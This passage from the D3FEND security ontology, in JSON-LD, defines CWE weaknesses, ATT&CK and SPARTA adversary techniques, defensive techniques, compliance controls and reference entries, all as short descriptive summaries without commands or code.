      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1256",
      "d3f:definition": "The product provides software-controllable device functionality for capabilities such as power and clock management, but it does not properly limit functionality that can lead to modification of hardware memory or register bits, or the ability to observe physical side channels.",
      "rdfs:label": "Improper Restriction of Software Interfaces to Hardware Features",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:PersonalComputer",
      "@type": "owl:Class",
      "d3f:definition": "A personal computer (PC) is a multi-purpose computer whose size, capabilities, and price make it feasible for individual use. Personal computers are intended to be operated directly by an end user, rather than by a computer expert or technician. Unlike large, costly minicomputers and mainframes, time-sharing by many people at the same time is not used with personal computers. PCs have in practice become powerful enough that they may be shared by multiple users at any given time, though this is not common practice nor the primary purpose of a PC.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Personal_computer"
      },
      "rdfs:label": "Personal Computer",
      "rdfs:subClassOf": {
        "@id": "d3f:ClientComputer"
      }
    },
    {
      "@id": "d3f:OTDeviceConfigurationCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "Configure or administer managed devices.",
      "rdfs:label": "OT Device Configuration Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTDeviceManagementMessageEvent"
        },
        {
          "@id": "_:Nea99252f69054bf99ec503e80007ba27"
        }
      ]
    },
    {
      "@id": "_:Nea99252f69054bf99ec503e80007ba27",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTDeviceConfigurationCommand"
      }
    },
    {
      "@id": "d3f:ExternalKnowledgeBase",
      "@type": "owl:Class",
      "d3f:pref-label": "External Knowledge Base",
      "rdfs:label": "External Knowledge Base",
      "rdfs:subClassOf": {
        "@id": "d3f:TechniqueReference"
      }
    },
    {
      "@id": "d3f:T1559.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1559.002",
      "d3f:definition": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.",
      "rdfs:label": "Dynamic Data Exchange",
      "rdfs:subClassOf": {
        "@id": "d3f:T1559"
      }
    },
    {
      "@id": "d3f:CWE-412",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-412",
      "d3f:definition": "The product properly checks for the existence of a lock, but the lock can be externally controlled or influenced by an actor that is outside of the intended sphere of control.",
      "rdfs:label": "Unrestricted Externally Accessible Lock",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:HTTPTraceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event where the HTTP TRACE method is used to perform a message loop-back test along the path to the target resource.",
      "rdfs:label": "HTTP TRACE Event",
      "rdfs:subClassOf": {
        "@id": "d3f:HTTPRequestEvent"
      }
    },
    {
      "@id": "d3f:Reference-SystemAndMethodForManagedSecurityAssessmentAndMitigation",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US9544324B2"
      },
      "d3f:kb-abstract": "In an embodiment of the invention, a system for assessing vulnerabilities includes: a security management system; a network device in a system under test (SUT), wherein the network device is privy to traffic in the SUT; and wherein the SMS is privy to traffic that is known by the network device and/or to one or more traffic observations that is known by the network device.",
      "d3f:kb-author": "Scott Parcel",
      "d3f:kb-organization": "Cenzic Inc, Trustwave Holdings Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:NetworkVulnerabilityAssessment"
      },
      "d3f:kb-reference-title": "System and method for managed security assessment and mitigation",
      "rdfs:label": "Reference - System and method for managed security assessment and mitigation"
    },
    {
      "@id": "d3f:CWE-541",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-541",
      "d3f:definition": "If an include file source is accessible, the file can contain usernames and passwords, as well as sensitive information pertaining to the application and system.",
      "rdfs:label": "Inclusion of Sensitive Information in an Include File",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-540"
      }
    },
    {
      "@id": "d3f:DS0008",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components",
      "rdfs:comment": "This data source captures events relating to kernel modules and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Kernel (ATT&CK DS)"
    },
    {
      "@id": "d3f:SystemInitProcess",
      "@type": "owl:Class",
      "d3f:definition": "A system initialization process is a process that executes to initialize (boot) an operating system.",
      "rdfs:label": "System Init Process",
      "rdfs:seeAlso": [
        {
          "@id": "dbr:Booting"
        },
        {
          "@id": "dbr:Linux_startup_process"
        },
        {
          "@id": "dbr:Windows_startup_process"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "skos:altLabel": [
        "System Initialization Process",
        "System Startup Process"
      ]
    },
    {
      "@id": "d3f:RestoreSoftware",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:RestoreSoftware"
      ],
      "d3f:d3fend-id": "D3-RS",
      "d3f:definition": "Restoring software to a host.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-CybersecurityIncidentandVulnerabilityResponsePlaybooks"
      },
      "d3f:restores": {
        "@id": "d3f:Software"
      },
      "rdfs:label": "Restore Software",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:RestoreObject"
        },
        {
          "@id": "_:Nbadd871e6fa646f39a8112241cd8f167"
        }
      ]
    },
    {
      "@id": "_:Nbadd871e6fa646f39a8112241cd8f167",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restores"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software"
      }
    },
    {
      "@id": "d3f:T1071.004",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1071.004",
      "d3f:definition": "Adversaries may communicate using the Domain Name System (DNS) application layer protocol to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.",
      "d3f:produces": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      },
      "rdfs:label": "DNS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1071"
        },
        {
          "@id": "_:N907675fc8385414fbc8f0df62f920ebb"
        }
      ]
    },
    {
      "@id": "_:N907675fc8385414fbc8f0df62f920ebb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OutboundInternetDNSLookupTraffic"
      }
    },
    {
      "@id": "d3f:IMP-0004",
      "@type": "owl:Class",
      "d3f:attack-id": "IMP-0004",
      "d3f:definition": "Measures designed to permanently impair (either partially or totally) the use of a system. Threat actors may target various subsystems or the hosted payload in such a way as to rapidly increase its degradation. This could potentially shorten the lifespan of the victim spacecraft.",
      "rdfs:label": "Degradation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IMP-0004/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTAImpactTechnique"
      },
      "skos:prefLabel": "Degradation"
    },
    {
      "@id": "d3f:Reference-CAR-2020-05-003%3ARareLolBASCommandLines_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2020-05-003/"
      },
      "d3f:kb-abstract": "LoLBAS are binaries and scripts that are built in to Windows, frequently are signed by Microsoft, and may be used by an attacker. Some LoLBAS are used very rarely and it might be possible to alert every time they’re used (this would depend on your environment), but many others are very common and can’t be simply alerted on.\n\nThis analytic takes all instances of LoLBAS execution and then looks for instances of command lines that are not normal in the environment. This can detect attackers (which will tend to need the binaries for something different than normal usage) but will also tend to have false positives.\n\nThe analytic needs to be tuned. The 1.5 in the query is the number of standard deviations away to look. It can be tuned up to filter out more noise and tuned down to get more results. This means it is probably best as a hunting analytic when you have analysts looking at the screen and able to tune the analytic up and down, because the threshold may not be stable for very long.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2020-05-003: Rare LolBAS Command Lines",
      "rdfs:label": "Reference - CAR-2020-05-003: Rare LolBAS Command Lines - MITRE"
    },
    {
      "@id": "d3f:fork",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "fork",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-process-object-property"
      }
    },
    {
      "@id": "d3f:CWE-655",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-655",
      "d3f:definition": "The product has a protection mechanism that is too difficult or inconvenient to use, encouraging non-malicious users to disable or bypass the mechanism, whether by accident or on purpose.",
      "rdfs:label": "Insufficient Psychological Acceptability",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-657"
        },
        {
          "@id": "d3f:CWE-693"
        }
      ]
    },
    {
      "@id": "d3f:CCI-001146_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs NSA-approved cryptography to protect classified information.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:DiskEncryption"
        },
        {
          "@id": "d3f:FileEncryption"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-21T00:00:00"
      },
      "rdfs:label": "CCI-001146"
    },
    {
      "@id": "d3f:CCI-001414_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system enforces approved authorizations for controlling the flow of information between interconnected systems based on organization-defined information flow control policies.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:InboundTrafficFiltering"
        },
        {
          "@id": "d3f:OutboundTrafficFiltering"
        }
      ],
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-24T00:00:00"
      },
      "rdfs:label": "CCI-001414"
    },
    {
      "@id": "d3f:IA-0002",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "IA-0002",
      "d3f:definition": "Adversaries target SDR-based transceivers and payload radios because reconfigurable waveforms, FPGA bitstreams, and software flowgraphs create programmable footholds. Manipulation can occur in the radio’s development pipeline (toolchains, out-of-tree modules), at integration (loading of bitstreams, DSP coefficients, calibration tables), or in service via update channels that deliver new waveforms or patches. On-orbit SDRs often expose control planes (command sets for mode/load/select), data planes (baseband I/Q), and management/telemetry paths, any of which can embed covert behavior, alternate demod paths, or hidden subcarriers. A compromised SDR can establish clandestine command-and-control by activating non-public waveforms, piggybacking on idle fields, or toggling to time/ephemeris-triggered profiles that blend with nominal operations. On the ground, compromised SDR modems can be used to fabricate mission-compatible emissions or to decode protected downlinks for reconnaissance. Attackers leverage the SDR’s malleability so that malicious signaling, once seeded, presents as a legitimate but rarely exercised configuration.",
      "d3f:may-modify": [
        {
          "@id": "d3f:Software-definedRadioConfiguration"
        },
        {
          "@id": "d3f:Software-definedRadioWaveformApplication"
        }
      ],
      "d3f:modifies": {
        "@id": "d3f:Software-definedRadio"
      },
      "rdfs:label": "Compromise Software Defined Radio - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/IA-0002/"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SPARTAInitialAccessTechnique"
        },
        {
          "@id": "_:Ndbc00f9e2c4d441692bfde18b9d39b7f"
        },
        {
          "@id": "_:Nbfec88e57a144916b6d8ced600d7f613"
        },
        {
          "@id": "_:N0732849e5a6e4e54a651e676032c3cff"
        }
      ],
      "skos:prefLabel": "Compromise Software Defined Radio"
    },
    {
      "@id": "_:Ndbc00f9e2c4d441692bfde18b9d39b7f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioConfiguration"
      }
    },
    {
      "@id": "_:Nbfec88e57a144916b6d8ced600d7f613",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-modify"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadioWaveformApplication"
      }
    },
    {
      "@id": "_:N0732849e5a6e4e54a651e676032c3cff",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:modifies"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Software-definedRadio"
      }
    },
    {
      "@id": "d3f:T1074.001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1074.001",
      "d3f:definition": "Adversaries may stage collected data in a central location or directory on the local system prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.",
      "d3f:may-create": {
        "@id": "d3f:File"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateFile"
      },
      "rdfs:label": "Local Data Staging",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:T1074"
        },
        {
          "@id": "_:N8f63619a00b94db4923e0ba26c4d6fee"
        },
        {
          "@id": "_:N86733ea74ba242faa3d3f72280d4ab85"
        }
      ]
    },
    {
      "@id": "_:N8f63619a00b94db4923e0ba26c4d6fee",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N86733ea74ba242faa3d3f72280d4ab85",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateFile"
      }
    },
    {
      "@id": "d3f:NetworkIsolation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:NetworkIsolation"
      ],
      "d3f:d3fend-id": "D3-NI",
      "d3f:definition": "Network Isolation techniques prevent network hosts from accessing non-essential system network resources.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "rdfs:label": "Network Isolation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefensiveTechnique"
        },
        {
          "@id": "_:N4c8492875a7b4cc1b86d0eb164186985"
        }
      ]
    },
    {
      "@id": "_:N4c8492875a7b4cc1b86d0eb164186985",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "d3f:REC-0002.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0002.03",
      "d3f:definition": "Adversaries collect high-level operational descriptors to predict when the mission will be busy, distracted, or temporarily less instrumented. Useful items include CONOPS overviews, daily/weekly activity rhythms, ground pass schedules, DSN or commercial network windows, calibration and maintenance timelines, planned wheel unloads or thruster burns, conjunction-assessment cycles, and anomaly response playbooks at the level of “who acts when.” For constellations, they seek plane/slot assignments, phasing and drift strategies, crosslink usage, and failover rules between vehicles. These descriptors enable time-targeted campaigns, e.g., sending malicious but syntactically valid commands near handovers, exploiting reduced telemetry during safing, or saturating links during high-rate downlinks.",
      "rdfs:label": "Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0002/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0002"
      },
      "skos:prefLabel": "Operations"
    },
    {
      "@id": "d3f:T1504",
      "@type": "owl:Class",
      "d3f:attack-id": "T1504",
      "d3f:definition": "Adversaries may gain persistence and elevate privileges in certain situations by abusing [PowerShell](https://attack.mitre.org/techniques/T1086) profiles. A PowerShell profile  (<code>profile.ps1</code>) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments. PowerShell supports several profiles depending on the user or host program. For example, there can be different profiles for PowerShell host programs such as the PowerShell console, PowerShell ISE or Visual Studio Code. An administrator can also configure a profile that applies to all users and host programs on the local computer. (Citation: Microsoft About Profiles)",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1546.013",
      "rdfs:label": "PowerShell Profile",
      "rdfs:seeAlso": {
        "@id": "d3f:T1546.013"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-1259",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1259",
      "d3f:definition": "The System-On-A-Chip (SoC) implements a Security Token mechanism to differentiate what actions are allowed or disallowed when a transaction originates from an entity. However, the Security Tokens are improperly protected.",
      "rdfs:label": "Improper Restriction of Security Token Assignment",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:T1505",
      "@type": "owl:Class",
      "d3f:attack-id": "T1505",
      "d3f:definition": "Adversaries may abuse legitimate extensible development features of servers to establish persistent access to systems. Enterprise server applications may include features that allow developers to write and install software or scripts to extend the functionality of the main application. Adversaries may install malicious components to extend and abuse server applications.(Citation: volexity_0day_sophos_FW)",
      "rdfs:label": "Server Software Component",
      "rdfs:subClassOf": {
        "@id": "d3f:PersistenceTechnique"
      }
    },
    {
      "@id": "d3f:DE-0003",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003",
      "d3f:definition": "The adversary manipulates housekeeping and control values that operators and autonomy rely on to judge activity, health, and command hygiene. Targets include command/telemetry counters, event/severity flags, downlink/reporting modes, cryptographic-mode indicators, and the system clock. By rewriting, freezing, or biasing these fields, and by selecting reduced or summary telemetry modes, unauthorized actions can proceed while the downlinked picture appears routine or incomplete. The result is delayed recognition, misattribution to environmental effects, or logs that cannot be reconciled post-facto.",
      "rdfs:label": "On-Board Values Obfuscation - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:SPARTADefenseEvasionTechnique"
      },
      "skos:prefLabel": "On-Board Values Obfuscation"
    },
    {
      "@id": "d3f:ComputerNetworkNode",
      "@type": "owl:Class",
      "d3f:definition": "A network node running on a computer platform.",
      "rdfs:label": "Computer Network Node",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_endpoint"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerPlatform"
        },
        {
          "@id": "d3f:NetworkNode"
        }
      ]
    },
    {
      "@id": "d3f:OperationalActivityPlan",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An activity is a specific behavior representing a set of actions that may be accomplished by an agent.",
      "d3f:synonym": [
        "Business Process",
        "Mission Critical Function",
        "Mission Function",
        "Organizational Activity Plan"
      ],
      "rdfs:label": "Operational Activity Plan",
      "rdfs:seeAlso": [
        {
          "@id": "http://wordnet-rdf.princeton.edu/id/00408356-n"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/Business_Process_Model_and_Notation"
        },
        {
          "@id": "https://en.wikipedia.org/wiki/IDEF0"
        },
        {
          "@id": "https://enterpriseintegrationlab.github.io/icity/Activity/doc/index-en.html"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:Plan"
      }
    },
    {
      "@id": "d3f:OTVariableAccessRestriction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3-OVAR",
      "d3f:definition": "Assign read/write access controls on designated registers or data tags to prevent unauthorized writes.",
      "d3f:enables": {
        "@id": "d3f:Isolate"
      },
      "d3f:kb-article": " ## How it works\n\nMany OT Controllers and OT Communication Modules enable Read-Only or Read/Write access on a per-tag basis.\n\nAs an example, when configuring OT process tags which can be accessed using the Modbus protocol, configure the tag to a Modbus Input Register to leverage the protocol's registry ranges, restricting the ability of external sources to modify data.\n\nIn Siemens, each data block (DB) tag can be configured as \"data block write-protected in the device.\"\n",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-PLX3x-Series-Multi-Protocol-Gateways"
        },
        {
          "@id": "d3f:Reference-S7-1200-Programmable-controller"
        },
        {
          "@id": "d3f:Reference-SecurePLCCodingPracticesTop20List"
        }
      ],
      "d3f:limits": {
        "@id": "d3f:OTLogicVariable"
      },
      "d3f:restricts": {
        "@id": "d3f:OTWriteCommand"
      },
      "d3f:synonym": "OT Variable Access Policy",
      "rdfs:isDefinedBy": "Top 20 Secure Coding Practices, #10",
      "rdfs:label": "OT Variable Access Restriction",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessMediation"
        },
        {
          "@id": "_:N18411b3632b34fec9bf3c329b1f943c0"
        },
        {
          "@id": "_:N86fb5467f1004a52a59ba1cfe2b1669b"
        },
        {
          "@id": "_:Naf2dc5e8daaa46c2ab3ebafe5af016cb"
        }
      ]
    },
    {
      "@id": "_:N18411b3632b34fec9bf3c329b1f943c0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Isolate"
      }
    },
    {
      "@id": "_:N86fb5467f1004a52a59ba1cfe2b1669b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:limits"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTLogicVariable"
      }
    },
    {
      "@id": "_:Naf2dc5e8daaa46c2ab3ebafe5af016cb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricts"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTWriteCommand"
      }
    },
    {
      "@id": "d3f:CWE-253",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-253",
      "d3f:definition": "The product incorrectly checks a return value from a function, which prevents it from detecting errors or exceptional conditions.",
      "rdfs:label": "Incorrect Check of Function Return Value",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-754"
        }
      ]
    },
    {
      "@id": "d3f:T1633.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1633.001",
      "d3f:definition": "Adversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behavior after checking for the presence of artifacts indicative of a virtual environment or sandbox. If the adversary detects a virtual environment, they may alter their malware’s behavior to disengage from the victim or conceal the core functions of the implant. They may also search for virtualization artifacts before dropping secondary or additional payloads.",
      "rdfs:label": "System Checks - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1633"
      },
      "skos:prefLabel": "System Checks"
    },
    {
      "@id": "d3f:Reference-Squiblydoo_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-04-003/"
      },
      "d3f:kb-abstract": "Squiblydoo is a specific usage of regsvr32.dll to load a COM scriptlet directly from the internet and execute it in a way that bypasses application whitelisting. It can be seen by looking for regsvr32.exe executions that load the scrobj.dll (which execute the COM scriptlet) or, if that is too noisy, those that also load content directly via HTTP or HTTPS.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-04-003: Squiblydoo",
      "rdfs:label": "Reference - CAR-2019-04-003: Squiblydoo - MITRE"
    },
    {
      "@id": "d3f:CWE-1423",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1423",
      "d3f:definition": "Shared microarchitectural predictor state may allow code to influence transient execution across a hardware boundary, potentially exposing data that is accessible beyond the boundary over a covert channel.",
      "rdfs:label": "Exposure of Sensitive Information caused by Shared Microarchitectural Predictor State that Influences Transient Execution",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1420"
      }
    },
    {
      "@id": "d3f:ConnectionAttemptAnalysis",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:ConnectionAttemptAnalysis"
      ],
      "d3f:analyzes": {
        "@id": "d3f:IntranetNetworkTraffic"
      },
      "d3f:d3fend-id": "D3-CAA",
      "d3f:definition": "Analyzing failed connections in a network to detect unauthorized activity.",
      "d3f:kb-article": "## How it works\nConnection Attempt Analysis in multiple ways.\n\n### Monitoring traffic to unallocated IP space\nOne approach looks for failed connection attempts against unallocated IP space. First, network traffic is captured to map out the network to identify network assets as well as unallocated IP space. The map is then used to determine if connection attempts are being made to the unallocated IP space.\n\n### Monitoring for sequentially transmitted traffic\nAnother approach passively inspects network traffic with application protocol analyzers observing network activity characteristics such as volume of packets sent/ received, TCP session attributes, and connection information between hosts (start time, source/destination host, services, etc.). Then using pattern matching to identify traffic which appears to be probing for network hosts.\n\n## Considerations\n\n* Implementations that rely on analysis of unallocated IP address space increase in their complexity with network size and decentralized network infrastructure.\n* Inventory of unallocated IP space should should be continuously updated to mitigate the risk of false positives.\n* IPv6 also introduces challenges including IPv6 traffic bypassing IPv4 specific protection systems (ex. firewalls and IDS) and complexity in managing both IPv6 and IPv4 addresses.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DetectingNetworkReconnaissanceByTrackingIntranetDark-netCommunications_VECTRANETWORKSInc"
      },
      "d3f:synonym": "Network Scan Detection",
      "rdfs:label": "Connection Attempt Analysis",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkTrafficAnalysis"
        },
        {
          "@id": "_:N1b7b77cae3e74fad8d89d95bd1700e9f"
        }
      ]
    },
    {
      "@id": "_:N1b7b77cae3e74fad8d89d95bd1700e9f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:analyzes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetNetworkTraffic"
      }
    },
    {
      "@id": "d3f:CWE-108",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-108",
      "d3f:definition": "Every Action Form must have a corresponding validation form.",
      "rdfs:label": "Struts: Unvalidated Action Form",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1173"
      }
    },
    {
      "@id": "d3f:OutboundInternetMailTraffic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Outbound internet DNS lookup traffic is network traffic using a standard email protocol on an outgoing connection initiated from a host within a network to a host outside the network.",
      "rdfs:label": "Outbound Internet Mail Traffic",
      "rdfs:seeAlso": {
        "@id": "dbr:Internetworking"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:OutboundInternetNetworkTraffic"
      },
      "skos:altLabel": "Outbound Internet Email Traffic"
    },
    {
      "@id": "d3f:T0818",
      "@type": "owl:Class",
      "d3f:attack-id": "T0818",
      "d3f:definition": "Adversaries will compromise and gain control of an engineering workstation for Initial Access into the control system environment. Access to an engineering workstation may occur through or physical means, such as a Valid Accounts with privileged access or infection by removable media. A dual-homed engineering workstation may allow the adversary access into multiple networks. For example, unsegregated process control, safety system, or information system networks. An Engineering Workstation is designed as a reliable computing platform that configures, maintains, and diagnoses control system equipment and applications. Compromise of an engineering workstation may provide access to, and control of, other control system applications and equipment. In the Maroochy attack, the adversary utilized a computer, possibly stolen, with proprietary engineering software to communicate with a wastewater system.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Engineering Workstation Compromise - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInitialAccessTechnique"
      },
      "skos:prefLabel": "Engineering Workstation Compromise"
    },
    {
      "@id": "d3f:StartupDirectory",
      "@type": "owl:Class",
      "d3f:definition": "A startup directory is a directory containing executable files or links to executable files which are run when a user logs in or when a system component or service is started.",
      "rdfs:label": "Startup Directory",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:LocalResource"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_AC-3_7",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Access Enforcement | Role-based Access Control",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "rdfs:label": "AC-3(7)"
    },
    {
      "@id": "d3f:T0812",
      "@type": "owl:Class",
      "d3f:attack-id": "T0812",
      "d3f:definition": "Adversaries may leverage manufacturer or supplier set default credentials on control system devices. These default credentials may have administrative permissions and may be necessary for initial configuration of the device. It is general best practice to change the passwords for these accounts as soon as possible, but some manufacturers may have devices that have passwords or usernames that cannot be changed. (Citation: Keith Stouffer May 2015)",
      "rdfs:label": "Default Credentials - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSLateralMovementTechnique"
      },
      "skos:prefLabel": "Default Credentials"
    },
    {
      "@id": "d3f:display-baseurl",
      "@type": "owl:AnnotationProperty",
      "d3f:definition": "A base string to use as prefix to create a full URL for an entity. The baseurl must end in a forward slash: /",
      "rdfs:label": "display-baseurl",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-display-annotation"
      }
    },
    {
      "@id": "d3f:NumericPatternMatching",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-NPM",
